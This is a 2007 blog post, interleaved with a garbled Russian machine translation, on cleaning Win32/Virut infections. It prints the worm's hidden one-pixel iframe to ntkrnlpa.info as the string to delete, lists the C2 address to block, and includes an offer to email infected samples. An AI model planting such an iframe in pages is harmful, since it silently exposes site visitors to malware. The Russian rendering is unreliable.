Fixes for files infected with Win32/virut.Virtob and Variants Исправления для файлов, инфицированных Win32/virut.Virtob и варианты

    • Nov Ноябрь
    • 12 12

    Fixes for files infected with Win32/virut.Virtob and Variants Исправления для файлов, инфицированных Win32/virut.Virtob и варианты

    Posted by Nick B 10 months, 3 weeks ago . Написал Ник B 10 месяца, 3 недели назад.

    Filed under Windows & Worm . Подано под Windows И Worm.

    Activity Monitor вирус Иконы I found this frustrating that most Anti-virus product will deleted or quarantine your infected files. Я нашел это разочаровывает, что большинство Антивирусные продукт будет удален или карантин ваш зараженные файлы. I lost many projects because of this worms. Я потерял много проектов, из-за этого "червей".

    Don’t used “auto-clean/fix” online scanner if you favors your projects. Не использовать "auto-clean/fix" онлайн сканером, если вы способствует ваши проекты. Belows is step by steps fixes for win32/Virut. Belows является шагом шаги для исправления win32/Virut. If you dont like manual editing you’ll need a search and replace tools for removing the embed code inside the infected files. Если вы не хотели ручное редактирование Вам потребуется поиск и замену инструментов для удаления встроить внутрь кода зараженных файлов.

    1. Make sure all of the infected (*.exe win32/virtob) files has been quarantine. Убедитесь, что все зараженные (*. EXE win32/virtob) файлов был карантин.
    2. Optionally block outbound access to 78.109.19.139:80 & irc port 65520 in your firewall settings. При желании блокировать внешний доступ к 78.109.19.139:80 И IRC-порт 65520 в настройки брандмауэра.
    3. Disabled AntiVirus if any. Инвалиды AntiVirus, если таковые имеются.
    4. Shutdown your PC and start windows on SafeMode (Press F8 or F5 after BIOS screen). Завершение работы компьютера и запуска Windows на SafeMode (Пресс-F5 или F8 после экрана BIOS).
    5. Search all files with *.htm, *.html, *.php, *.asp extensions. Поиск всех файлов с *. HTM, *. html, *. PHP, ASP расширениями *..
      delete or replace the following text (strings) удалить или заменить следующим текстом (строк) 

       <iframe src="http://ntkrnlpa.info/cr/?i=1" height="1" width="1"></iframe> <iframe src="http://ntkrnlpa.info/cr/?i=1" height="1" width="1"> </ IFRAME>

    Search and Replace Tools Поиск и замена инструментов

    • For windows - there is lots of similar tools and I’m not sure which one to recommend as it seem most did the same thing so Google for “search-and-replace” pick your best. За окнами - существует множество аналогичных инструментов, и я не уверен, какой рекомендовать, как она представляется наиболее сделала то же самое, с тем Google для "поиска и замены" выберите лучший.
    • For Cygwin or *nix bash console - Used sed commands to search & replace strings in all infected files. Для Cygwin или * NIX Баш консоли - б SED команд для поиска И заменить струны на всех зараженных файлов.
    • Python in windows - You can try this solutions . Python в окнах - Вы можете попробовать этого решения.

    Win32/Virut Virustotal.com Results Win32/Virut Virustotal.com результаты

    Antivirus Антивирус Version Версия Last Update Последнее обновление Result Результат
    AhnLab-V3 AHNLAB-V3 2007.11.12.0 2007.11.12 - --
    AntiVir 7.6.0.34 2007.11.12 W32/Virut.AF
    Authentium 4.93.8 2007.11.10 - --
    Avast AVAST 4.7.1074.0 2007.11.11 Win32:Virtob Win32: Virtob
    AVG 7.5.0.503 2007.11.11 Win32/Virut
    BitDefender Bitdefender 7.2 7,2 2007.11.12 Win32.Virtob.6.Gen
    CAT-QuickHeal 9.00 9,00 2007.11.12 W32.Virut.K
    ClamAV 0.91.2 2007.11.12 W32.Virut-5
    DrWeb 4.44.0.09170 2007.11.12 Win32.Virut.19
    eSafe ESAFE 7.0.15.0 2007.11.08 - --
    eTrust-Vet 31.2.5289 2007.11.12 Win32/Virut.6375
    Ewido 4.0 4,0 2007.11.12 - --
    FileAdvisor 1 2007.11.12 - --
    Fortinet 3.11.0.0 2007.10.19 W32/Virut.AE
    F-Prot F-PROT 4.4.2.54 2007.11.10 W32/Injector.A.gen!Eldorado W32/Injector.A.gen! Эльдорадо
    F-Secure 6.70.13030.0 2007.11.12 Virus.Win32.Virut.ab
    Ikarus Икарус T3.1.1.12 2007.11.12 Win32.Virtob.AS
    Kaspersky 7.0.0.125 2007.11.12 Virus.Win32.Virut.ab
    McAfee 5160 2007.11.09 W32/Virut.g
    Microsoft 1.3007 1,3007 2007.11.12 Virus:Win32/Virut.Q Вирус: Win32/Virut.Q
    NOD32v2 2653 2007.11.12 - --
    Norman Норман 5.80.02 2007.11.09 W32/Virut.W
    Panda Панда 9.0.0.4 2007.11.11 W32/Virutas.W
    Prevx1 V2 2007.11.12 - --
    Rising Растет 20.18.02.00 2007.11.12 Win32.Virut.z
    Sophos 4.23.0 2007.11.12 W32/Vetor-G
    Sunbelt 2.2.907.0 2007.11.09 VIPRE.Suspicious
    Symantec 10 2007.11.12 W32.Virut.W
    TheHacker 6.2.9.124 2007.11.12 W32/Virut.gen
    VBA32 3.12.2.4 2007.11.11 - --
    VirusBuster 4.3.26:9 2007.11.11 Win32.Virut.Gen.4
    Webwasher-Gateway Webwasher-шлюз 6.0.1 2007.11.12 Win32.Virut.AF

    Notes on Microsoft Windows Malicious Software Removal Tool Заметки по Microsoft Windows Malicious Software Removal Tool

    Update On: Nov,20 2007 by NoahArk Обновление On: Ноябрь, 20 2007 NoahArk
    I have Win.32/virut files in my archive (for backup purpose). Я Win.32/virut файлы в моем архиве (для целей резервного копирования). Last week I installed Microsoft Windows Malicious Software Removal tool v1.35 (Nov 13, 2007, KB890830). На прошлой неделе я установил Microsoft Windows Malicious Software Removal Tool v1.35 (13 ноября 2007, KB890830).

    Microsoft Средство удаления вредоносных программ Microsoft’s claimed this tool can fixes w32/Virut . Microsoft в утверждал этот инструмент может исправления w32/Virut. But the results is much worsed than I expected. Но результаты значительно worsed, чем я ожидал. It doesn’t detect Win32/Virut on my windows XP SP2 instead halfway before the scan complete its trigger the worm and starts spreading as Win32/virtob & Virut[AW] (infecting *.exe & *.html). Он не обнаруживает Win32/Virut на моем Windows XP SP2, а на полпути до ее полного сканирования вызывать червя и начинает распространение в качестве Win32/virtob И Virut [А] (заражение *. EXE И *. HTML). I’d removed all Microsoft Removal tools (MS Malicious Software Removal tool, MS Defender,MS Baseline Security Analyzer). Я бы удалить все утилиты Microsoft (MS Malicious Software Removal Tool, MS Защитнику, MS Baseline Security Analyzer). Microsoft Developer should have know better on how to prevent most of these type infections.Its their own design flaw and products. Microsoft Developer должно быть лучше известно о том, как предотвратить большинство из этих типов infections.Its свои собственные разработки и недостаток продуктов.

    I still keep the infected Win32/Virut files, if anyone need it please send an email to Я по-прежнему держать Win32/Virut зараженные файлы, если кто в ней нуждается отправьте сообщение на nhnoah email . My request to Microsoft Team, they should clean this crapy worms so all those unfortunate client’s (including me) wont have to hunt down on pricey antivirus solutions. Мой запрос к Microsoft Team, они должны чистого этом креповый червей поэтому все эти сожаления клиента (включая меня) имеют обыкновение охотиться вниз по дороге антивирусного решения.

    W32/Virut and ntkrnlpa.info W32/Virut и ntkrnlpa.info

    The worms started spreading since September 2006 . Началось распространение червей с сентября 2006 года. After one year anniversay It still in the wild like it will never stop. После одного года anniversay Он по-прежнему в дикой природе, как оно никогда не прекратится.

    I’d send a letter to ntkrnlpa.info ISP (hosting.ua), and they have closed down the sites for good. Я бы направить письмо с ntkrnlpa.info провайдера (hosting.ua), и они закрыли сайты для блага. And also google is blocking the site too it will give you a warning notice if search for the particular url. А также Google блокирует сайт слишком оно даст вам предупреждение уведомление, если искать для конкретного URL.

    This worm spread via simple html tags and increased the filesize around 8kb. Вирус-червь, распространение через простые HTML-тэги и расширение файла около 8KB. Because of this simple method and low damage most Anti-Virus and security vendor label it as medium and low. Из-за этого простого метода и низким ущербом наиболее Антивирус и безопасность продавцов оно, как ярлык со средним и низким. The thread label is debatable. Нить ярлык является спорным.

    Based on wikipedia “Usage share of Web Browser Statistics” , 81% of Internet users is using Microsoft Internet Explorer (50% of this weblog visitors is on IE too ), IE browser doesn’t blocked IFRAME that can be a problem. Исходя из Википедии "Использование доля веб-браузера статистика", 81% пользователей Интернета используют Microsoft Internet Explorer (50% посетителей этого веб-журнала на IE тоже), т.е. браузер не заблокировал окно, которое может быть проблема.

    Imagine if some webmaster uploaded an infected files on heavy traffic websites like myspace and facebook. Представьте, если некоторые веб-мастера загруженные зараженные файлы от интенсивного движения сайты, как MySpace и Facebook. The results could be disaster. Полученные результаты можно было бы катастрофой. Nobody want to see its happening. Никто не хотите видеть свое место.

    Related Entries Связанные Конкурсные

    About the Author Об авторе

     

    Tags: Теги:
    • November 12, 2007 at 12:35 pm 12 ноября 2007 года в 12:35 вечера
    • February 8, 2008 at 10:58 am 8 февраля 2008 года в 10:58 утра
    • 0.3 0,3
    • url URL

    • 2 Responses toFixes for files infected with Win32/virut.Virtob and Variants 2 Ответы на "Исправления для файлов, инфицированных Win32/virut.Virtob и варианты"

      Trackback URL: Trackback URL: Use the TrackBack url ↑ to ping this article. Используйте ↑ TrackBack URL для пинг настоящей статьи. If your blog does not support Trackbacks you might want to leave a comment instead. Если Ваш блог не поддерживает Trackbacks Вы можете оставить комментарий, вместо.
          • Feb Февраль
          • 05 05
          • http://www.gravatar.com/avatar/f99366a8d8e8dc45dea20f78d9ea10fe?s=58&d=http://42.kaizeku.com/wp-content/themes/wp-istalker-pb/images/gravatar.png&r=G http://www.gravatar.com/avatar/f99366a8d8e8dc45dea20f78d9ea10fe?s=58&d=http://42.kaizeku.com/wp-content/themes/wp-istalker-pb/images/gravatar.png&r=G
        • RE: Fixes for files infected with Win32/virut.Virtob and Variants RE: Исправляет файлы, инфицированные Win32/virut.Virtob и варианты
          Fixes for files infected with Win32/virut.Virtob and Variants Bernd P 8 months ago 3 url · microId Исправления для файлов, инфицированных Win32/virut.Virtob и варианты Бернд С 8 месяцев назад 3 URL microId

          The problem in prevention of viruses like the Virut types is that they change the "bothosts" as well as the as the encryption with every new variant coming out. Проблема предупреждения о вирусах, как Virut типов заключается в том, что они изменяют "bothosts", а также, как шифрование с каждым новым вариантом выходит. A possible good solution to prevent your machine from making unauthorized unwanted connects by any unknown process or program is to have eg a ZoneAlarm firewall installed (which allows precisely blocking of eg STMP for specified programs - the default is 'blocked' - , specified port blocking (eg IRC ), preventing and denying any unsolicited inbound traffic, as well as the adaptive IDENT port hiding,(means this is a true stealth firewall).and specified security behavior concerning internet, intranet, local, safe zones, as well as a 5-step safety profile to set for specified programs). Возможно хорошим решением для предотвращения компьютер от несанкционированного нежелательных подключается к какой-либо неизвестного процесса или программы заключается в том, чтобы, например ZoneAlarm установлен брандмауэр (который позволяет точно блокирование например STMP для конкретных программах - по умолчанию это "заблокирован" -, указанный порт блокирующие (например, IRC), предотвращения и недопущения каких-либо нежелательных входящего трафика, а также адаптивные IDENT порт скрывался, (это означает, верно стелс брандмауэр). указано безопасности и поведения в отношении интернет, интранет, местные, безопасные зоны, а также 5-шаг безопасность профиль установить для определенных программ).

          Additionally the user is informed about every network action and access attempts - ingoing as well outgoing - with source, Кроме того, пользователь информируется о каждом сети действий и попытки доступа - входящий, а исходящие - с источником,
          target, port and the program or process name which initiates the connection. цели, порт, и программа или процесс, имя, которое инициирует подключение. Preventing spam-bot behavior means : only allow 'your' known Mail programs to send mails. Предотвращение спам-бота поведение означает: позволить только "ваши" известные почтовые программы для отправки почты. NEVER store ANY PASSWORDS on the machine or in the mail program! НИКОГДА не храните пароли на ЛЮБОЙ машине или в почтовой программы! Set ' SMTP action' to 'password required' even if your SMTP provider doesn't need (if so this means anonymous SMTP is allowed, then you Набор 'SMTP действий ", чтобы" пароль ", даже если ваш SMTP провайдера не нужно (если да, это означает, анонимные SMTP разрешен, то вы
          have a BAD ISP which is really inviting spambots to spread their notorious garbage all around the world!). иметь плохую ISP, который является действительно пригласив spambots для распространения своих пресловутых мусора во всем мире!).



          Essential Safety-rules are still ignored by the ISP in such cases. Основные правила безопасности по-прежнему игнорируются ISP в таких случаях. By the same way, the customers of such ISP are the victims of these. К таким же образом, клиенты такого провайдера, являются жертвами этого. Go looking for another ISP if possible. Перейти ищет другого провайдера, если это возможно. All other programs should be blocked for SMTP (and IRC) protocols as well. Все остальные программы, должны быть заблокированы для SMTP (и IRC), а протоколы. That is essential in those days to keep an infected machine quiet towards the internet even if it is eventually infected by some weird worm, or botclient software. Это крайне важно в те дни сохранить зараженном компьютере тихо к Интернету, даже если она в конечном итоге, инфицированных некоторые странные черви, или botclient программного обеспечения. (Then your PC is called 'stoned' or how it is also said by the security people, a so-called 'Zombie'). (Тогда ваш компьютер называется "побили" или как он также сказал, соображениями безопасности людей, так называемых "зомби"). Never allow HTTP or any other outgoing requests for other programs aside of your known browser, media-players or Никогда не позволять HTTP или любые другие исходящие запросы на другие программы в сторону вашего известный браузер, медиа-плееры или
          file transfer, mail and chat programs. передачи файлов, почту и чат-программы. Be aware that especially 'Adware','Nag-Ware' and 'Spy-ware'-charged programs are always trying to 'phone home'! Помните, что прежде всего "Adware", "Наг-Ware" и "Spy-ware'-обвинение программы всегда пытается" телефон дома!



          Same does Malware which attempts to reach or at least listens to their 'master hosts', (of course allow such for the safety facilities on your system to update themselves by their known code hosts). То же делает вредоносных программ, которые пытается достичь или, по крайней мере, слушает их "мастера Саваоф", (конечно, допустить, чтобы такие для безопасности объектов в вашей системе для обновления себя, своих известных код хостов). Using a host list which redirects therein contained servers to nowhere (means the localhost) is also a good hint. Используя целый список, который перенаправляет содержащиеся в нем серверов в никуда (подразумевается локальный) также хороший намек. This file is also protected from being tampered with (unauthorized deletions or additions by any software or website scripts) by third party software (ie ZoneAlarm, McAffee, Nod32). Этот файл также защищены от подделаны (несанкционированного изъятия или добавления каких-либо программное обеспечение или веб-сайт скриптов) к третьей стороне программное обеспечение (например ZoneAlarm, McAffee, NOD32).

          • (cc) 2008 Bernd P. (CC) 2008 Бернд П.
          • Ie-6 on Win98 · #1 IE-6 на Win98 # 1
          • May Май
          • 06 06
          • http://www.gravatar.com/avatar/ced02c315e8f5a22e4599edf97f3839c?s=58&d=http://42.kaizeku.com/wp-content/themes/wp-istalker-pb/images/gravatar.png&r=G http://www.gravatar.com/avatar/ced02c315e8f5a22e4599edf97f3839c?s=58&d=http://42.kaizeku.com/wp-content/themes/wp-istalker-pb/images/gravatar.png&r=G
        • RE: Fixes for files infected with Win32/virut.Virtob and Variants RE: Исправляет файлы, инфицированные Win32/virut.Virtob и варианты
          Fixes for files infected with Win32/virut.Virtob and Variants zyro 5 months ago 3 url · microId Исправления для файлов, инфицированных Win32/virut.Virtob и варианты zyro 5 месяцев назад, 3 URL microId

          hi there Привет там
          can u please email me these files I just wanna use them for learning purpose может у пожалуйста, напишите мне эти файлы, я просто хочу использовать их для учебных целей

          THANKS BUDDY СПАСИБО Buddy

          • (cc) 2008 zyro. (CC) 2008 zyro.
          • Ie-7 on Winvista · #2 IE-7 на Winvista # 2

    RSS feed for comments in this post RSS канал для комментариев на эту должность

    "write as if you were talking to a good friend (in front of your mother)." "писать, как если бы вы разговаривали с хорошим другом (в передней части вашей матери).

    .have your say . Ваш говорят

    Disclaimer: For any content that you post, you hereby grant to Kakkoi the royalty-free, irrevocable, perpetual, exclusive and fully sublicensable license to use, reproduce, modify, adapt, publish, translate, create derivative works from, distribute, perform and display such content in whole or in part, world-wide and to incorporate it in other works, in any form, media or technology now known or later developed. Some rights reserved. Оговорка: Для любого содержания, которое вы разместите, Вы тем самым предоставляете Kakkoi роялти, окончательное, вечное, эксклюзивные и сублицензируемое на использование, воспроизведение, модификацию, адаптацию, публикацию, перевод, создание производной работы, не распространять, исполнять или показывать такое содержимое полностью или частично, во всем мире и включение его в другие произведения в любой форме, в средствах массовой информации или технологии, в настоящее время известен или поздно разработать. Некоторые права защищены.

MySQL query error MySQL запросов об ошибке